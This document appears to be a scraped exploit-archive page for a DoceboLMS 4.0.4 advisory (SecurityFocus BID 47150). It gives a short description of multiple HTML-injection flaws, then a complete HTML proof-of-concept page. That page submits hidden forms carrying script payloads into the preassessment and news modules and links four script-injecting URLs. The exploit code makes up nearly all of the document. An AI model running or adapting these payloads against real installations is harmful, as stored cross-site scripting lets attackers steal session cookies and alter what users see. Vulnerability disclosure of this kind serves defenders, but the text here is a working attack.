扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
source: https://www.securityfocus.com/bid/47150/info DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. DoceboLMS 4.0.4 is vulnerable; other versions may also be affected. <html> <title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title> <body bgcolor="#1C1C1C"> <script type="text/javascript"> function xss1(){document.forms["xss1"].submit();} function xss2(){document.forms["xss2"].submit();} </script> <br /><br /> <form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1"> <input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" /> <input type="hidden" name="code" value='"><script>alert(1)</script>' /> <input type="hidden" name="description" value="ZSL" /> <input type="hidden" name="id_assess" value="0" /> <input type="hidden" name="name" value='"><script>alert(2)</script>' /> <input type="hidden" name="save" value="Save changes" /></form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br /> <form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2"> <input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" /> <input type="hidden" name="language" value="2" /> <input type="hidden" name="long_desc" value="" /> <input type="hidden" name="news" value="Insert" /> <input type="hidden" name="short_desc" value="ZSL" /> <input type="hidden" name="title" value='"><script>alert(1)</script>' /></form> <a href="javascript: xss2();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br /> </body></html> |
体验盒子
